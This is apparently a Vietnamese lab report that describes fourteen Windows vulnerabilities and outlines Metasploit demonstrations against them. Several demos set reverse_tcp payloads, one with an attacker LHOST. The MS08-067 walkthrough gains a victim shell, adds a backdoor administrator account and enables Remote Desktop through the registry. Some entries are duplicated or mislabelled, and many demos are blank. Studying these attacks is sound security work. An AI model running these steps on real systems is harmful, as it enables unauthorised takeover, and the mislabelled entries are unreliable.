LỖ HỎNG BẢO MẬT TRONG WINDOWS 1. Lỗ hổng MS13-071: a. Mô tả: Lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng áp dụng một chủ đề Windows thủ công trên hệ thống của họ. Trong mọi trường hợp, người dùng không thể bị buộc phải mở tập tin hoặc áp dụng các chủ đề, đối với một cuộc tấn công thành công, người dùng phải được thuyết phục để làm như vậy. b. Phần mềm bị ảnh hưởng: Windows XP Windows Vista Windows Server 2003 Windows Server 2008 c. Demo:
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
LỖ HỎNG BẢO MẬT TRONG WINDOWS
1. Lỗ hổng MS13-071:
a. Mô tả:
Lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng áp dụng một chủ đề Windows thủ
công trên hệ thống của họ. Trong mọi trường hợp, người dùng không thể bị buộc phải mở tập tin hoặc
áp dụng các chủ đề, đối với một cuộc tấn công thành công, người dùng phải được thuyết phục để làm
như vậy.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Vista
Windows Server 2003
Windows Server 2008
c. Demo:
Sử dụng mã lỗi ms13-071
Set payload reverse_tcp
Set các giá trị option
Tiến hành exploit
Bắt được session của victim
2. Lỗ hổng MS13-080:
a. Mô tả:
Các lỗ hổng nghiêm trọng nhất có thể cho phép thực thi mã từ xa nếu người dùng xem một trang
web thiết kế đặc biệt sử dụng Internet Explorer . Một kẻ tấn công khai thác thành công nghiêm trọng
nhất của các lỗ hổng có thể lấy được quyền sử dụng giống như người dùng hiện hành . Người dùng có
tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với
những người dùng hoạt động với người sử dụng quyền hành chính.
b. Phần mềm bị ảnh hưởng:
Internet Explorer 6, 7, 8, 9, 10, 11
c. Demo:
Sử dụng mã lỗi ms13-080
Set payload reverse_tcp
Set lhost
Set srvhost và ruipath
Tiến hành Exploit
Bắt được session của victim
3. Lỗ hổng MS10-042:
a. Mô tả:
Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một
thông báo e-mail.
b. Phần mềm bị ảnh hưởng:
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
c. Demo:
Sử dụng mã lỗi ms10-042
Set payload reverse_tcp và
set giá trị srvhost và lhost
Tiến hành exploit
Bắt được session của victim
4. Lỗ hổng MS12-027:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng truy cập một trang web có chứa
nội dung đặc biệt được thiết kế để khai thác lỗ hổng. Trong mọi trường hợp, tuy nhiên, kẻ tấn công sẽ
không có cách nào để buộc người dùng truy cập một trang web như vậ. Thay vào đó, kẻ tấn công sẽ
phải thuyết phục người dùng truy cập các trang web, thường bằng cách cho họ bấm vào một liên kết
trong một email hoặc tin nhắn chỉ dẫn họ đến trang web của kẻ tấn công . Các tập tin độc hại có thể
được gửi như một file đính kèm email, nhưng những kẻ tấn công sẽ phải thuyết phục người sử dụng mở
file đính kèm để khai thác lỗ hổng.
b. Phần mềm bị ảnh hưởng:
Microsoft Office 2003, Microsoft Office 2007; Microsoft Office 2010 (except x64-based
editions); Microsoft SQL Server 2000 Analysis Services, Microsoft SQL Server 2000 (except
Itanium-based editions), Microsoft SQL Server 2005 (except Microsoft SQL Server 2005
Express Edition, but including Microsoft SQL Server 2005 Express Edition with Advanced
Services), Microsoft SQL Server 2008, Microsoft SQL Server 2008 R2, Microsoft BizTalk
Server 2002, Microsoft Commerce Server 2002, Microsoft Commerce Server 2007, Microsoft
Commerce Server 2009, Microsoft Commerce Server 2009 R2, Microsoft Visual FoxPro 8.0,
Microsoft Visual FoxPro 9.0, and Visual Basic 6.0 Runtime
c. Demo:
Sử dụng mã lỗi ms12-027
Set payload và các giá trị option cần
thiết
Tiến hành exploit
Di chuyển tập tin word vừa tạo ra
desktop và gửi cho victim
Tiến hành cấu hình handler để lắng
nghe
Set payload và option của handler
Tiến hành run handler và kết quả khi
victim chạy tập tin word, ta bắt được
session của viction
5. Lỗ hổng MS09-050:
a. Mô tả:
Một lỗ hổng nghiêm trọng (Dos và Exec code) có thể cho phép thực thi mã từ xa nếu kẻ tấn
công gửi một gói SMB thiết kế đặc biệt với một máy tính chạy các dịch vụ Server.
b. Phần mềm bị ảnh hưởng:
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista
x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service
Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems
Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based
Systems Service Pack 2
c. Demo:
Sử dụng mã lỗi ms09-050
Set payload reverse_tcp
và các option cần thiết
Tiến hành exploit và bắt
được session của victim
6. Lỗ hổng MS10-046:
a. Mô tả:
Một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi
mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác
thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh
hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
Lỗi nguy hiểm nằm trong các tập tin "shortcut" (định dạng *.Ink) của Windows, các tập tin này
thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã
độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một
thư mục chứa tập tin shortcut nhúng mã độc.
Bản vá lỗi có chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng.
Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows
Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc"
(Blue Screen of Death - BSOD).
b. Phần mềm bị ảnh hưởng:
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service
Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems
Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based
Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
c. Demo
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
7. Lỗ hổng MS12-020:
a. Mô tả:
Hai lỗ hổng bảo mật riêng tư trong Remote Desktop Protocol (Exec Code và DoS). Lỗ hổng có
thể cho phép thực thi mã từ xa nếu một kẻ tấn công gửi một chuỗi các gói RDP thiết kế đặc biệt với
một hệ thống bị ảnh hưởng. Theo mặc định, Remote Desktop Protocol (RDP) không được kích hoạt
trên bất kỳ hệ điều hành Windows. Các hệ thống không đã kích hoạt RDP không có nguy cơ.
b. Phần mềm bị ảnh hưởng:
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based
Systems Service Pack 1
Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-
based Systems Service Pack 1
c. Demo
Sử dụng mã lỗi
ms12-020
Set options
Tiến hành run
Máy của victim đã
bị dump
8. Lỗ hổng MS11-080:
a. Mô tả:
Lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công đăng nhập vào hệ thống của người sử
dụng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công phải có các thông tin đăng nhập hợp lệ
và có thể đăng nhập cục bộ để khai thác lỗ hổng.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
c. Demo
Sử dụng mã lỗi ms13-080
Set payload và các option cần
thiết
Tiến hành exploit
Khi victim truy cập vào link thì
chúng ta bắt được session của
victim
9. Lỗ hổng MS12-004:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập tin phương tiện
truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử
dụng giống như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng
ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử
dụng quyền hành chính..
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo
1. Use exploit/windows/browser/ms12_004_midi
2. Xem IP máy attacker:Ifconfig
3. set SRVHOST máy attacker
4. set PAYLOAD windows/meterpreter/reverse_tcp
5. set LHOST 192.168.0.7
6. Tiến hành Exploit
7.
10. Lỗ hổng MS10-073:
a. Mô tả:
một số lỗ hổng bảo mật được tiết lộ công khai trong các trình điều khiển hạt nhân-mode
Windows. Nghiêm trọng nhất trong số các lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công
đăng nhập vào một hệ thống bị ảnh hưởng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công
phải có các thông tin đăng nhập hợp lệ và có thể đăng nhập cục bộ để khai thác lỗ hổng này. Dễ bị tổn
thương không thể bị khai thác từ xa hoặc bởi người dùng vô danh.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo:
1.
2.
3.
4.
5.
11. Lỗ hổng MS10-061:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu kẻ tấn công gửi một yêu cầu in thiết kế đặc
biệt với một hệ thống dễ bị tổn thương có một giao diện spooler in tiếp xúc qua RPC . Theo mặc định ,
máy in không được chia sẻ trên bất kỳ hệ điều hành Windows hỗ trợ.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo:
1.
2. nmap 2.2.2.105
12. Lỗ hổng MS10-046:
a. Mô tả:
một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi
mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác
thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh
hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo:
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
13. Lỗ hổng MS11-006:
a. Mô tả:
một lỗ hổng được công bố công khai trong bộ vi xử lý đồ họa Windows Shell. Các lỗ hổng có
thể cho phép thực thi mã từ xa nếu người dùng xem một hình ảnh thu nhỏ thiết kế đặc biệt. Một kẻ tấn
công khai thác thành công lỗ hổng này có thể lấy được quyền sử dụng giống như người dùng đăng
nhập vào. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể
được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
c. Demo:
1.
2.
3.
4.
5.
6.
7.
8.
14. Lỗ hổng MS08-067:a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu một hệ thống bị ảnh hưởng nhận được yêu
cầu RPC đặc biệt. Trên Microsoft Windows 2000, Windows XP, và 2003 hệ thống Windows Server, kẻ
tấn công có thể khai thác lỗ hổng này mà không cần xác thực để chạy mã nhị phân. Có thể là lỗ hổng
này có thể được sử dụng trong crafting của một wormable khai thác. Tường lửa thực hành tốt nhất và
cấu hình tường lửa mặc định tiêu chuẩn có thể giúp bảo vệ tài nguyên mạng từ các cuộc tấn công có
nguồn gốc bên ngoài chu vi doanh nghiệp.
b. Phần mềm bị ảnh hưởng:
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 1
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP1 for Itanium-based Systems
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista and Windows Vista Service Pack 1
Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems
Windows Server 2008 for Itanium-based Systems
c. Demo:
1. Khởi động chương trình msfgui Chọn menu Exploits windows More… smb ms08_067_netapi
2. Phần Targets để Automatics Targeting
3. Về Payload chọn windows/shell_bind_tcp
4. RHOST: Điền IP của máy Victim
5. Click Run exploit
6. Nếu Exploit thành công sẽ có 1 session được tạo ra, double click vào session đó để vào cmd của máy Victim
7. Để kiểm tra xem đây có phải là cmd của máy Victim không. Ta dùng lệnh ipconfig
8. Tạo 1 user: luanvan, password: 123 với lệnhnet user luanvan 123 /add
9. Add user vừa tạo vào group Administrators bằng lệnhnet localgroup administrators luanvan /add
10. Remote desktop tới máy Victim thất bại vì máy Victim chưa bật Remote Desktop
11. Để bật chức năng remote Desktop của máy Victim ta dùng lệnh:reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
12. Hoàn toàn chiếm được quyền điều khiển máy Victim